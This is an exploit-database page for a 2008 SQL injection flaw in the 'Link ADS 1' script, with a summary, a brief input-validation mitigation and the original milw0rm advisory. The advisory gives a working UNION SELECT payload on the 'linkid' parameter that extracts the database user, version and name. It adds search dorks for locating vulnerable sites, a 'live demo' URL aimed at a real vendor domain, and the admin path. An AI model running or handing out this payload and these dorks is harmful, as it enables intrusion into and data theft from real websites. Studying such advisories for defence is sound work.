Link ADS 1 SQL Injection Vulnerability

vendor:

Link ADS 1

by:

Hussin X

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Link ADS 1

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Link ADS 1 SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable script. This can be done by appending a malicious SQL query to the vulnerable parameter 'linkid' in the URL. An example of this is http://www.site.org/Script/out.php?linkid=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11--. This will allow the attacker to view the database information such as the username, version, and database name.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.

Source

Exploit-DB raw data:

#########################################################
#
#   Link ADS 1  SQL Injection Vulnerability
#========================================================
#
#    Author: Hussin X                                   
#                                                       
#    Home :  www.tryag.cc/cc                            
#                                                     
#    email:  darkangel_g85[at]Yahoo[DoT]com            
#            hussin.x[at]hotmail[DoT]com                
#                                               
#========================================================
#    HomE script : http://e-topbiz.com/
#     
#    Demo : http://e-topbiz.com/oprema/pages/linkads1.php  
#    
#    DorK : out.php?linkid=1
#    DorK : inurl:"out.php?linkid=1"
##########################################################

Exploit:   


http://www.site.org/Script/out.php?linkid=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11--




L!VE DEMO:

http://e-topbiz.com/trafficdemos/linkads1/out.php?linkid=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11--


LogiN:


/admin/

 
################################################################################
####################################( Greetz )##################################
#                                                                              #
#      tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke          #      

#                 Silic0n  / Rafi / FAHD / Iraqihack                           #      

#                                                                              #
#################################(and All IRAQIs)###############################
################################################################################

# milw0rm.com [2008-06-24]